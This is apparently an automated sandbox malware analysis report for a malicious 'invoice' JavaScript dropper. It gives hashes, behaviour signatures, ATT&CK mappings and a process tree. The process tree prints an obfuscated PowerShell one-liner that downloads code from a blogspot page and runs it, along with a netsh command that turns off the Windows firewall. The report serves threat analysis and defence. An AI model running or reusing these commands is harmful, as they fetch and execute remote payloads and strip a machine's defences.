Overview

overview

10

Static

static

1

invoice_2566246817.js

windows7-x64

7

invoice_2566246817.js

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-12-2023 06:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    invoice_2566246817.js

  • Size

    106KB

  • MD5

    fc6d7a11059fee2eda2bab5e4c82c839

  • SHA1

    9907895c521bddd02573ca5e361490f017932dbe

  • SHA256

    39afb67d0916e6761f7604cb65ebdb1c115f24e62d9b122c0137b46215a0b00c

  • SHA512

    1e820c22e9cbd0f360b7187eb8062089ead22cfd1a62e0e47450523659b841bf37278ddfd530c4792529d88145ceb1ff88389d541fda9e68d9c127ba5579fb39

  • SSDEEP

    384:boJdyttnpXrov4gPyjjF/9sui+1VaEEEfEfffEfEffESxyOVYZPjcrdRoDT/8W8z:kS5W

Score
10/10
evasionpersistencetrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Registers COM server for autorun 1 TTPs 2 IoCs
    persistence
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\invoice_2566246817.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4624
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c $((irm hotelofficeewn.blogspot.com////////////////////////////////////atom.xml) | .('{1}{0}'-f'kasokdaoskdoaksodkasodkaoskdoaksdoaksod','I').replace('kasokdaoskdoaksodkasodkaoskdoaksdoaksod','ex'))
      2⤵
      • UAC bypass
      • Blocklisted process makes network request
      • Registers COM server for autorun
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3852
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\niunxias\niunxias.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4868
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4C7.tmp" "c:\Users\Admin\AppData\Local\Temp\niunxias\CSCDB641AFE20A84F9EA853DC636A93F63.TMP"
          4⤵
            PID:4852
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue
          3⤵
          • Modifies Windows Firewall
          PID:1724
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3380
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3832
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 792
            4⤵
            • Drops file in Windows directory
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of AdjustPrivilegeToken
            PID:3132
        • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
          "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4656
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 780
            4⤵
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious use of AdjustPrivilegeToken
            PID:440

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Persistence

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    2
    T1547.001

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Privilege Escalation

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    2
    T1547.001

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Defense Evasion

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Impair Defenses

    1
    T1562

    Disable or Modify Tools

    1
    T1562.001

    Modify Registry

    2
    T1112

    Credential Access

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    4
    T1082

    Lateral Movement

    Collection

    Command and Control

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESC4C7.tmp
      Filesize

      1KB

      MD5

      f90449ff46a0a799573e41774f8a20cf

      SHA1

      257c931853443a22ff4b3c678aa3b2bf881f8779

      SHA256

      ad7a9de7259c379b02dbd055e21a44f0cb368b5bb1e963542f0fdf3ddad0c0cf

      SHA512

      776ca5012cdfd2afcdb6c47da92ab79cbe75dce96052e5091e0eab80f93ba4d035310d0c0b9c2be7e54bd68bc9b81a7681b209498465d1f002186dc236dc8710

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_enwnxugs.asn.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\niunxias\niunxias.dll
      Filesize

      3KB

      MD5

      e0ce5b6ec2b89d92dbd182b6583df217

      SHA1

      dec6b47e0e245f180a949a23e76001c9ffab8512

      SHA256

      a443b8438a2916b837d934511f810c302b049f03dd96ffdb6b8d6c8c14b27f9b

      SHA512

      40376910d1774e2422c77932baf98a13275e276b6bb83bf04f6509062e6e9067c4e2c1ff3465ad68e038573860480bc9a2cd3e0475956ee298a1f29b09fef766

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\niunxias\CSCDB641AFE20A84F9EA853DC636A93F63.TMP
      Filesize

      652B

      MD5

      afc35df7b4f0d0d601b8ddf0d35b67cf

      SHA1

      1db3d856c04050a5f8a9e8f26cb806bab0b93636

      SHA256

      29d933a433d3772f09629534362813e99c17265441ee71c24fb2494d2dd91abf

      SHA512

      ca48d4cc5f8e6738c026f66d5b6d5ca8d405ccfe3be6b9dac8f8e5263d89f3f3194d8119312ce2548e70a7d793efa70c13dc4a21191b34aafaa0a25e912a38fd

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\niunxias\niunxias.0.cs
      Filesize

      870B

      MD5

      e06ebf853695db38aaac82c9af297ae4

      SHA1

      ef98bacec5ac2ae3bf24aac8ed56935a25c1f064

      SHA256

      79c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344

      SHA512

      036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\niunxias\niunxias.cmdline
      Filesize

      369B

      MD5

      9181e389bc27463a5a1ad6c8c9801c13

      SHA1

      9aff9713e7332cf5da786284ff34c8d6f27d9c36

      SHA256

      0cbc6f198428a1a86750fec0b006f104c2154746be4f15431133f4ef58488be9

      SHA512

      64b5bbab13ad27f63866653e476774f3c2539a48f848b83ad43bb459c2a3d339def8c520cdd0315121812dae08d4bdf45964d31170101debf5edc9aa6b3557e0

      Download Submit

    • memory/3380-56-0x0000000005320000-0x0000000005386000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3380-54-0x0000000005280000-0x0000000005312000-memory.dmp

      Filesize

      584KB

      Download

    • memory/3380-71-0x00000000051D0000-0x00000000051E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3380-70-0x0000000074640000-0x0000000074DF0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3380-69-0x0000000006A10000-0x0000000006A1A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/3380-68-0x0000000006A30000-0x0000000006ACC000-memory.dmp

      Filesize

      624KB

      Download

    • memory/3380-67-0x0000000006B60000-0x0000000006D22000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/3380-66-0x0000000006940000-0x0000000006990000-memory.dmp

      Filesize

      320KB

      Download

    • memory/3380-57-0x00000000051D0000-0x00000000051E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3380-42-0x0000000074640000-0x0000000074DF0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3380-33-0x0000000000400000-0x000000000046C000-memory.dmp

      Filesize

      432KB

      Download

    • memory/3380-41-0x00000000056C0000-0x0000000005C64000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3380-39-0x0000000000B50000-0x0000000000BBC000-memory.dmp

      Filesize

      432KB

      Download

    • memory/3832-47-0x0000000074080000-0x0000000074631000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/3832-38-0x0000000074080000-0x0000000074631000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/3832-55-0x00000000014D0000-0x00000000014E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3852-30-0x00000244D3050000-0x00000244D3060000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3852-29-0x00000244D3050000-0x00000244D3060000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3852-11-0x00000244D3050000-0x00000244D3060000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3852-32-0x00000244D12A0000-0x00000244D12BA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3852-31-0x00000244D1260000-0x00000244D126E000-memory.dmp

      Filesize

      56KB

      Download

    • memory/3852-5-0x00000244D3060000-0x00000244D3082000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3852-12-0x00000244EBA00000-0x00000244EBBC2000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/3852-26-0x00000244D3040000-0x00000244D3048000-memory.dmp

      Filesize

      32KB

      Download

    • memory/3852-65-0x00007FFD9DC50000-0x00007FFD9E711000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3852-10-0x00007FFD9DC50000-0x00007FFD9E711000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3852-28-0x00007FFD9DC50000-0x00007FFD9E711000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4656-48-0x00000000015C0000-0x00000000015D0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4656-40-0x0000000074080000-0x0000000074631000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/4656-62-0x0000000074080000-0x0000000074631000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/4656-53-0x0000000074080000-0x0000000074631000-memory.dmp

      Filesize

      5.7MB

      Download